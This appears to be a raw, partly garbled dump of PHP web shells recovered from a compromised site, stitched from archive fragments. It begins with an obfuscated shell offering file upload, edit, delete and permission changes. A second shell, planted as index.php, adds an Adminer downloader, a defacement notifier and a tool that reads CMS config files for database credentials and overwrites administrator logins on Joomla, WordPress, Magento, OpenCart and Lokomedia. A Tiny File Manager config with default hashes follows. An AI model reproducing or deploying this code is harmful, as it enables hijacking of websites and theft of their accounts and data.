} goto a3yUv; k3N95: goto jycuQ; goto ouN_B; uiNll: echo "\74\x2f\150\65\x3e\15\12\x3c\x66\157\x72\x6d\40\x6d\x65\x74\x68\x6f\144\75\x22\160\157\x73\164\x22\x3e\xd\12\40\x20\40\x20\74\x64\x69\166\40\x63\x6c\x61\163\163\75\x22\x66\157\x72\x6d\x2d\x67\162\157\165\160\42\76\xd\12\40\x20\40\x20\x20\x20\40\x20\x3c\x69\x6e\x70\165\x74\x20\164\171\x70\145\75\x22\x74\145\170\164\x22\40\156\141\x6d\145\x3d\x22\x6e\x65\x77\137\160\x65\x72\155\x69\x73\x73\x69\x6f\x6e\x73\x22\x20\151\x64\x3d\x22\x6e\145\x77\x5f\x70\x65\162\155\x69\163\163\151\157\156\x73\42\40\x63\154\x61\163\163\x3d\42\142\x6f\x72\x64\145\x72\x20\160\x2d\61\x22\x20\x70\154\141\143\x65\x68\157\x6c\144\145\162\75\x22\103\157\156\164\x6f\x68\x3a\40\x30\x37\x35\65\x22\x20\x73\x74\x79\x6c\145\75\x22\x74\145\170\164\x2d\x61\154\151\x67\x6e\x3a\40\143\x65\156\x74\x65\162\73\x22\x3e\15\12\40\x20\x20\40\74\x2f\144\151\166\76\xd\12\40\x20\40\x20\x3c\144\151\x76\40\143\x6c\141\x73\x73\x3d\x22\146\x6f\x72\155\55\147\162\157\x75\x70\x22\x20\163\x74\171\154\x65\75\42\155\141\x72\147\151\x6e\x2d\x74\157\x70\72\x20\61\x30\160\170\73\x22\x3e\15\12\40\40\x20\x20\40\40\x20\x20\x3c\142\165\x74\x74\157\x6e\x20\x74\x79\x70\145\75\x22\163\165\x62\155\151\x74\x22\40\x6e\x61\155\145\75\x22\143\x68\141\156\x67\x65\x5f\x70\145\162\155\x73\x22\x20\x63\154\141\163\163\75\42\x6f\x68\x63\164\42\76\x55\x62\141\x68\40\x49\172\x69\x6e\x3c\57\142\165\164\164\157\x6e\76\15\xa\40\x20\x20\40\74\57\x64\151\x76\76\15\xa\74\x2f\146\x6f\x72\155\76\xd\12\15\xa"; goto oUPhS; ub8zK: xe("\106\x69\x6c\145\40\x62\x65\162\150\141\x73\151\154\x20\144\x69\x75\x6e\x67\x67\x61\150"); goto XbO1F; qkvjE: Q1N8Z: goto ckKLx; aRFgz: if (!isset($_POST["\x63\162\145\x61\164\145\x5f\146\151\154\145"])) { goto cHfGd; } goto iOZrz; SrtER: JuQTj: goto psV4R; f5aRU: $folderName = $_POST["\146\157\x6c\x64\x65\x72\137\156\141\155\145"]; goto X9oWu; M6ABo: echo $_SERVER["\123\x45\122\x56\x45\122\x5f\123\117\x46\124\127\101\122\x45"]; goto SwPKx; w2eNq: echo Ss($Jd) . "\46\x61\75" . sS("\x6e\145\x77\104\x69\x72"); goto XuBX4; PBWDG: oKtRs: goto G8ZaQ; APzPP: DqkC1: goto DFSe3; Ne4KB: mBbAB: goto y8gBw; X0blT: PW8sr: goto ned6r; IYt8j: uEny2: goto ub8zK; G8ZaQ: if (!($im == "\x65\x64\x69\x74")) { goto sVyvh; } goto k3N95; CmQdn: echo htmlspecialchars(jD($_GET["\156"])); goto MycnO; XjoI2: $newPerms = $_POST["\x6e\145\x77\137\x70\x65\162\155\151\x73\163\x69\157\x6e\x73"]; goto c6P__; K71UA: if ($im == "\144\145\154\145\x74\x65") { goto nhGdW; } goto fJZSg; fRdU4: function Jd($SP) { goto byBFn; byBFn: $dE = ''; goto KdwWq; AZq7K: $dE .= chr(hexdec($SP[$lE] . $SP[$lE + 1])); goto GTawt; JIesp: goto sY9T1; goto K2d5G; n7IWq: mZHDS: goto GB4ed; s8o21: return $dE; goto pWRTP; GTawt: KgfRl: goto mjhT4; K2d5G: gte_y: goto AZq7K; mjhT4: $lE += 2; goto Ywk5Q; oCr1K: $lE = 0; goto n7IWq; KdwWq: $gf = strlen($SP) - 1; goto oCr1K; GB4ed: if ($lE < $gf) { goto gte_y; } goto JIesp; vVstd: sY9T1: goto s8o21; Ywk5Q: goto mZHDS; goto vVstd; pWRTP: } goto KH9aY; rjz3G: goto WuWzI; goto ui2ii; RgCVA: BgYPr: goto V32i4; N93Qc: WuWzI: goto P3c4U; S2fjQ: qLlQw: goto SA16k; QznLN: echo htmlspecialchars(jD($_GET["\156"])); goto Ovz2f; jtnD_: if (is_writable($filePath)) { goto YepRA; } goto tqKCZ; Nc198: goto Bh2fC; goto aAPZK; t2P1z: xe("\x42\145\x72\150\141\163\x69\x6c\40\x6d\145\x6e\x67\165\142\141\x68\40\151\x7a\151\x6e"); goto EaJYU; hky0H: FuJKP: goto z47JB; K0vFC: ini_set("\x64\151\163\160\x6c\141\171\x5f\x65\162\162\157\x72\x73", 0); goto qZkE2; liHBS: cuWoE: goto YpqQB; hQI_R: wf9aW: goto klVg8; J6449: goto Fk3E1; goto liHBS; c6P__: $currentDir = getcwd(); goto y1nIx; Ovz2f: echo "\74\57\x66\x6f\156\164\76\xd\xa\74\x2f\150\x35\x3e\xd\xa\74\x64\x69\x76\x20\143\154\141\x73\163\x3d\x22\x66\x6f\162\155\55\x67\x72\157\165\160\42\x3e\15\12\x3c\x74\145\170\x74\141\x72\145\141\x20\156\x61\x6d\145\x3d\x22\146\x69\154\145\137\143\157\x6e\164\145\x6e\x74\42\x20\151\144\75\42\x66\x69\154\145\x5f\x63\157\156\164\145\x6e\164\x22\40\x63\157\154\x73\75\x22\x33\60\x22\x20\162\157\167\x73\75\42\x31\60\x22\x20\143\x6c\x61\163\163\x3d\42\146\157\162\x6d\x2d\x63\x6f\x6e\164\162\157\x6c\x20\x72\x61\151\156\x62\157\167\x2d\x62\x6f\x72\x64\145\162\x22\40\x72\x65\x61\144\157\x6e\x6c\171\x3e"; goto yCXHO; lP14A: $Jd = $c8[2](); goto vNGYA; KhgEs: echo "\x3c\57\x73\160\141\x6e\x3e\74\57\154\x69\x3e\15\xa\x3c\154\x69\x3e\123\x65\x72\x76\x65\x72\40\x49\x50\40\72\x20\x3c\163\x70\141\156\40\x73\x74\x79\x6c\x65\75\x22\x63\x6f\154\x6f\162\x3a\x20\x77\x68\x69\164\x65\73\42\x3e"; goto i6dER; LHxHL: Xe("\146\141\151\154\145\144\40\164\157\40\144\145\154\x65\164\145\40\164\x68\x65\x20\146\x69\x6c\145", 0); goto QMnli; m_WJB: goto NF5Mp; goto V4aUK; JkfzH: $filePath = "{$currentDir}\x2f{$fileName}"; goto tCv0u; v9nE0: echo "\x22\x20\143\154\x61\x73\x73\x3d\42\x6f\x68\x63\164\42\x3e\102\165\141\164\x20\x46\x69\x6c\145\x3c\57\141\76\x20\x7c\40\74\x61\40\x68\162\145\x66\x3d\42\x3f\x70\75"; goto w2eNq; SetU1: if (!($im == "\x72\x65\156\x61\x6d\145")) { goto oKtRs; } goto iJrKt; XoXZZ: $c8[3](Jd($_GET["\160"])); goto Ne4KB; BrZJD: Xe("\106\157\x6c\x64\x65\162\x20\x67\141\147\141\x6c\x20\x64\151\x62\165\141\164", 0); goto ZB075; oO92L: if (!isset($_POST["\162\x65\x6e\x61\x6d\145\137\x66\151\x6c\x65"])) { goto X6Epq; } goto epYd3; DbYJr: echo "\42\40\163\164\171\154\145\75\x22\164\x65\x78\164\55\141\154\x69\147\x6e\x3a\x20\143\145\156\x74\145\x72\73\x22\76\xd\xa\40\x20\40\x20\74\57\x64\151\x76\x3e\xd\12\x20\40\40\40\x3c\x64\151\x76\x20\143\x6c\x61\163\163\x3d\x22\146\157\162\155\x2d\x67\162\157\x75\x70\42\x20\163\x74\171\154\x65\x3d\x22\x6d\x61\x72\x67\x69\x6e\55\164\x6f\x70\x3a\x20\x31\60\x70\x78\73\x22\x3e\15\12\x20\40\40\40\x20\40\40\40\74\x62\x75\x74\164\157\x6e\40\164\171\x70\x65\x3d\x22\163\165\x62\x6d\x69\x74\42\x20\156\141\x6d\x65\75\42\162\145\x6e\141\x6d\145\137\146\x69\x6c\x65\42\40\143\154\x61\x73\163\75\x22\157\x68\143\x74\x22\76\x53\x61\166\x65\x3c\x2f\142\x75\164\164\x6f\x6e\76\15\xa\x20\40\40\40\74\57\144\x69\x76\x3e\xd\xa\x3c\x2f\146\157\x72\x6d\x3e\xd\xa\15\xa"; goto oO92L; X9oWu: $currentDir = getcwd(); goto l6lHy; QMnli: goto oGhKM; goto NaeCm; cSpMC: Xe("\x46\x69\x6c\x65\40\147\141\147\141\154\40\x64\151\142\165\x61\x74", 0); goto sueaT; aAPZK: eDnbO: goto t2P1z; uLQpu: if (rename($oldPath, $newPath)) { goto cuWoE; } goto Hczko; O4wAy: echo "\x20\xd\12\x3c\x2f\144\151\166\76\xd\xa\74\x73\143\162\x69\160\x74\40\x73\162\143\75\42\x2f\x2f\143\157\x64\x65\x2e\x6a\x71\x75\145\162\171\x2e\x63\157\155\x2f\152\161\165\145\162\x79\x2d\x33\x2e\x35\56\x31\x2e\x73\x6c\x69\x6d\56\155\151\156\56\x6a\163\x22\x3e\74\x2f\163\143\x72\151\160\164\x3e\xd\xa\74\x73\x63\162\x69\160\164\x20\x73\x72\143\x3d\42\x2f\x2f\143\144\156\x2e\x6a\x73\x64\x65\154\x69\x76\162\56\x6e\x65\164\x2f\x6e\160\x6d\x2f\x62\x6f\x6f\164\163\164\162\141\x70\100\64\x2e\66\x2e\60\x2f\144\x69\163\164\x2f\152\x73\x2f\x62\157\x6f\x74\163\x74\162\x61\160\56\142\x75\156\x64\x6c\x65\56\x6d\x69\x6e\56\152\163\x22\40\x3e\74\57\x73\143\x72\x69\160\164\76\15\12\x3c\x73\x63\x72\151\x70\x74\40\x73\x72\143\x3d\x22\x2f\57\x63\144\x6e\x2e\152\163\144\x65\154\151\x76\162\56\156\145\164\x2f\x6e\160\x6d\x2f\142\163\x2d\143\x75\x73\164\x6f\155\55\x66\x69\x6c\x65\55\x69\156\x70\x75\x74\57\144\151\x73\164\x2f\142\163\x2d\x63\x75\x73\x74\x6f\x6d\55\146\x69\x6c\x65\55\151\156\160\x75\x74\x2e\x6d\x69\x6e\x2e\152\163\42\76\74\x2f\x73\143\162\151\x70\164\76\xd\xa\x3c\x73\x63\162\151\160\x74\40\164\x79\x70\x65\75\42\164\145\170\x74\x2f\x6a\141\x76\x61\x73\x63\162\x69\x70\164\x22\76\x65\x76\141\x6c\x28\146\165\x6e\143\x74\151\x6f\156\x28\160\x2c\141\x2c\x63\x2c\153\54\x65\x2c\x64\x29\x7b\145\75\146\x75\156\143\x74\x69\x6f\156\x28\x63\51\173\162\145\164\165\x72\156\50\x63\x3c\141\77\x27\x27\x3a\145\x28\x70\141\162\x73\x65\x49\x6e\164\50\x63\x2f\x61\x29\x29\51\x2b\50\x28\x63\75\143\45\141\x29\x3e\x33\x35\77\123\x74\x72\x69\x6e\x67\x2e\x66\x72\157\155\x43\x68\x61\x72\103\x6f\x64\145\50\143\x2b\62\71\51\x3a\x63\56\164\157\x53\x74\x72\x69\x6e\x67\50\63\66\x29\x29\175\x3b\151\x66\x28\41\47\47\x2e\162\145\160\154\x61\143\x65\50\x2f\x5e\x2f\54\x53\164\162\151\156\147\x29\51\173\167\x68\151\154\145\50\x63\55\55\x29\x7b\x64\133\145\x28\x63\x29\x5d\x3d\153\133\x63\x5d\174\x7c\145\x28\x63\x29\175\153\x3d\x5b\x66\x75\156\x63\164\x69\x6f\156\50\145\51\173\x72\x65\164\x75\x72\156\40\x64\133\145\135\x7d\135\x3b\x65\75\x66\x75\156\143\164\x69\157\x6e\x28\51\x7b\x72\145\x74\165\162\156\x27\134\x5c\x77\53\x27\175\x3b\x63\75\x31\x7d\x3b\167\x68\x69\154\145\50\143\x2d\x2d\x29\173\x69\x66\x28\x6b\x5b\x63\135\x29\x7b\x70\x3d\160\56\x72\x65\x70\x6c\x61\143\x65\x28\x6e\x65\x77\40\122\145\147\x45\170\x70\50\x27\x5c\x5c\x62\x27\x2b\x65\50\143\x29\x2b\47\134\134\142\x27\x2c\x27\x67\47\x29\54\153\133\x63\x5d\x29\x7d\x7d\162\145\164\165\x72\156\40\160\175\x28\47\105\56\156\x28\51\x3b\x24\50\134\x27\133\x32\55\x6d\75\x22\64\42\135\x5c\47\x29\56\x34\50\x29\x3b\44\50\x22\56\x6c\42\x29\56\x6b\x28\152\50\x65\51\173\145\56\x67\x28\x29\73\150\x20\x30\x3d\44\x28\66\x29\x2e\x35\50\x22\62\55\60\42\x29\73\x63\x28\x7b\x62\x3a\x22\141\42\54\71\72\x22\157\x20\151\x20\x71\x3f\42\x2c\x77\x3a\x22\104\x20\42\x2b\60\x2b\42\x20\x70\40\x43\40\x42\x22\x2c\x41\72\67\x2c\x7a\x3a\67\x2c\175\x29\56\x79\x28\50\70\x29\75\76\x7b\x72\50\x38\x29\x7b\x78\x20\x31\x3d\x24\50\66\x29\56\x35\50\x22\x33\42\51\x2b\x22\46\x74\x3d\42\x2b\50\x28\60\75\75\42\x76\42\51\77\42\144\x22\x3a\42\146\x22\51\x3b\x75\56\x73\56\x33\75\x31\x7d\175\51\175\x29\73\47\54\64\61\54\64\x31\x2c\47\164\171\x70\145\174\142\165\x69\x6c\144\125\x52\114\x7c\x64\141\164\x61\174\150\x72\145\146\x7c\x74\157\x6f\x6c\x74\x69\x70\x7c\x61\x74\x74\x72\x7c\164\x68\151\163\174\164\162\x75\145\174\167\151\154\x6c\104\145\x6c\x65\164\x65\174\x74\x69\164\x6c\145\174\167\141\162\x6e\x69\156\147\174\151\143\157\x6e\174\x73\x77\141\154\174\174\x7c\174\x70\162\x65\x76\x65\156\164\104\145\146\141\165\154\164\x7c\154\145\x74\x7c\171\157\x75\x7c\x66\165\156\143\x74\x69\x6f\x6e\x7c\143\x6c\x69\x63\x6b\174\x64\145\154\145\164\145\x7c\164\157\147\x67\x6c\x65\174\x69\156\x69\164\174\101\162\145\x7c\x77\x69\x6c\x6c\174\163\165\x72\x65\x7c\151\x66\174\x6c\157\143\x61\x74\151\x6f\x6e\x7c\174\144\x6f\143\x75\x6d\145\156\x74\174\x66\157\x6c\144\145\x72\x7c\164\145\170\164\x7c\143\157\x6e\163\164\x7c\x74\x68\x65\x6e\174\x64\x61\x6e\147\145\162\115\x6f\x64\x65\x7c\142\165\x74\164\157\156\x73\x7c\x64\145\x6c\x65\164\145\x64\174\142\x65\x7c\124\x68\x69\x73\x7c\142\x73\103\x75\x73\x74\157\155\106\x69\154\x65\x49\156\160\x75\x74\x27\x2e\163\x70\x6c\x69\164\50\x27\x7c\x27\x29\54\x30\x2c\173\175\x29\51\x3c\x2f\163\143\x72\x69\160\x74\x3e\15\xa\x3c\57\x62\157\144\x79\76\xd\xa\x3c\x2f\x68\164\155\154\76"; PK15\ .htaccessnuW+ADeny from all PK35\t[ I[I[media/gwabf/mbtc/index.phpnuW+A

Adminer Downloader

"; if (file_exists('adminer.php')) { echo "-> adminer login <-"; } else { if (adminer("https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php", "adminer.php")) { echo "-> adminer login <-"; } else { echo "Failed to create adminer.php"; } } echo "
"; exit; } // Simulated Zone-H Notifier if (isset($_GET['DPH']) && $_GET['DPH'] == 'zoneh') { echo "

Zone-H Style Notifier (Simulated)

"; if (isset($_POST['submit'])) { $domainList = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Notifier Archive: http://zone-h.org/archive/notifier=$nick

"; foreach ($domainList as $url) { $url = trim($url); if ($url) { echo htmlspecialchars($url) . " -> SIMULATED_OK
"; } } } else { echo "
Defacer:

Domains:

"; } echo "
"; exit; } // Auto Edit User Config if (isset($_GET['DPH']) && $_GET['DPH'] == 'edit_user') { function ambilkata($string, $start, $end) { $str = explode($start, $string); if (isset($str[1])) { $str = explode($end, $str[1]); return $str[0]; } return ''; } if (isset($_POST['hajar'])) { if (strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "

Auto Edit User Config

DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; exit; } } // Directory Navigation $pathParts = explode("/", $currentDir); echo "
"; foreach ($pathParts as $k => $v) { if ($v == "" && $k == 0) { echo "/"; continue; } $dirPath = implode("/", array_slice($pathParts, 0, $k + 1)); echo "$v/"; } echo "
"; // Upload if (isset($_POST['s']) && isset($_FILES['u']) && $_FILES['u']['error'] == 0) { $fileName = $_FILES['u']['name']; $tmpName = $_FILES['u']['tmp_name']; $destination = $currentDir . '/' . $fileName; if (move_uploaded_file($tmpName, $destination)) { echo ""; } else { echo ""; } } // File/Folder Listing $items = scandir($currentDir); if ($items !== false) { echo ""; echo ""; foreach ($items as $item) { $fullPath = $currentDir . '/' . $item; if ($item == '.' || $item == '..') continue; if (is_dir($fullPath)) { echo ""; } else { $size = filesize($fullPath) / 1024; $size = $size >= 1024 ? round($size / 1024, 2) . 'MB' : round($size, 2) . 'KB'; echo ""; } } echo "
NameSizeAction
📁 $item----
📄 $item$size" . "Delete | " . "Edit | " . "Rename" . "
"; } else { echo "

Unable to read directory!

"; } // Delete File if (isset($_POST['del'])) { $filePath = base64_decode($_POST['del']); $fileDir = dirname($filePath); if (@unlink($filePath)) { echo ""; } else { echo ""; } } // Edit File if (isset($_POST['edit'])) { $filePath = base64_decode($_POST['edit']); $fileDir = dirname($filePath); if (file_exists($filePath)) { echo ""; echo "Back"; echo "
"; } } // Save Edited File if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) { $filePath = base64_decode($_POST['obj']); $fileDir = dirname($filePath); if (file_put_contents($filePath, $_POST['content'])) { echo ""; } else { echo ""; } } // Rename if (isset($_POST['ren'])) { $oldPath = base64_decode($_POST['ren']); $oldDir = dirname($oldPath); if (isset($_POST['new'])) { $newPath = $oldDir . '/' . $_POST['new']; if (rename($oldPath, $newPath)) { echo ""; } else { echo ""; } } else { echo "
New Name:
"; } } ?> File Manager + Adminer + ZoneH + AutoEditUser
Adminer Download | Zone-H Notifier | Auto Edit User Config
PK'75\Vzrxoe/index.phpnuW+A 'Password', 'Username2' => 'Password2', ...) // Generate secure password hash - https://tinyfilemanager.github.io/docs/pwd.html $auth_users = array( 'admin' => '$2y$10$D5FN5gNpeDd4IB9XwjNES.hbDWuHpYCQ.GPWh4SwE4iz2nVvYA3wO', //pass 'user' => '$2y$10$/KVtAF/hL79tCnCbZOeQnedoXXbBIe.sw9r02yPX0Uhy85GUsRe9q' //12345 ); // Readonly users // e.g. array('users', 'guest', ...) $readonly_users = array( 'user' ); // Enable highlight.js (https://highlightjs.org/) on view's page $use_highlightjs = true; // highlight.js style // for dark theme use 'ir-black' $highlightjs_style = 'vs'; // Enable ace.js (https://ace.c9.io/) on view's page $edit_files = true; // Default timezone for date() and time() // Doc - http://php.net/manual/en/timezones.php $default_timezone = 'Etc/UTC'; // UTC // Root path for file manager // use absolute path of directory i.e: '/var/www/folder' or $_SERVER['DOCUMENT_ROOT'].'/folder' $root_path = $_SERVER['DOCUMENT_ROOT']; // Root url for links in file manager.Relative to $http_host. Variants: '', 'path/to/subfolder' // Will not working if $root_path will be outside of server document root $root_url = ''; // Server hostname. Can set manually if wrong $http_host = $_SERVER['HTTP_HOST']; // user specific directories // array('Username' => 'Directory path', 'Username2' => 'Directory path', ...) $directories_users = array(); // input encoding for iconv $iconv_input_encoding = 'UTF-8'; // date() format for file modification date // Doc - https://www.php.net/manual/en/function.date.php $datetime_format = 'd.m.y H:i'; // Allowed file extensions for create and rename files // e.g. 'txt,html,css,js' $allowed_file_extensions = ''; // Allowed file extensions for upload files // e.g. 'gif,png,jpg,html,txt' $allowed_upload_extensions = ''; // Favicon path. This can be either a full url to an .PNG image, or a path based on the document root. // full path, e.g http://example.com/favicon.png // local path, e.g images/icons/favicon.png $favicon_path = ''; // Files and folders to excluded from listing // e.g. array('myfile.html', 'personal-folder', '*.php', ...) $exclude_items = array(); // Online office Docs Viewer // Availabe rules are 'google', 'microsoft' or false // google => View documents using Google Docs Viewer // microsoft => View documents using Microsoft Web Apps Viewer // false => disable online doc viewer $online_viewer = 'google'; // Sticky Nav bar // true => enable sticky header // false => disable sticky header $sticky_navbar = true; // Maximum file upload size // Increase the following values in php.ini to work properly // memory_limit, upload_max_filesize, post_max_size $max_upload_size_bytes = 5000; // Possible rules are 'OFF', 'AND' or 'OR' // OFF => Don't check connection IP, defaults to OFF // AND => Connection must be on the whitelist, and not on the blacklist // OR => Connection must be on the whitelist, or not on the blacklist $ip_ruleset = 'OFF'; // Should users be notified of their block? $ip_silent = true; // IP-addresses, both ipv4 and ipv6 $ip_whitelist = array( '127.0.0.1', // local ipv4 '::1' // local ipv6 ); // IP-addresses, both ipv4 and ipv6 $ip_blacklist = array( '0.0.0.0', // non-routable meta ipv4 '::' // non-routable meta ipv6 ); // if User has the customized config file, try to use it to override the default config above $config_file = __DIR__.'/config.php'; if (is_readable($config_file)) { @include($config_file); } // --- EDIT BELOW CAREFULLY OR DO NOT EDIT AT ALL --- // max upload file size define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); // private key and session name to store to the session if ( !defined( 'FM_SESSION_ID')) { define('FM_SESSION_ID', 'filemanager'); } // Configuration $cfg = new FM_Config(); // Default language $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; // Show or hide files and folders that starts with a dot $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; // PHP error reporting - false = Turns off Errors, true = Turns on Errors $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; // Hide Permissions and Owner cols in file-listing $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Show directory size: true or speedup output: false $calc_folder = isset($cfg->data['calc_folder']) ? $cfg->data['calc_folder'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); //available languages $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } // if fm included if (defined('FM_EMBED')) { $use_auth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') && function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter(''); session_name(FM_SESSION_ID ); function session_error_handling_function($code, $msg, $file, $line) { // Permission denied for default session, try to create a new one if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } if (empty($auth_users)) { $use_auth = false; } $is_https = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https'; // update $root_url based on user specific directories if (isset($_SESSION[FM_SESSION_ID]['logged']) && !empty($directories_users[$_SESSION[FM_SESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = 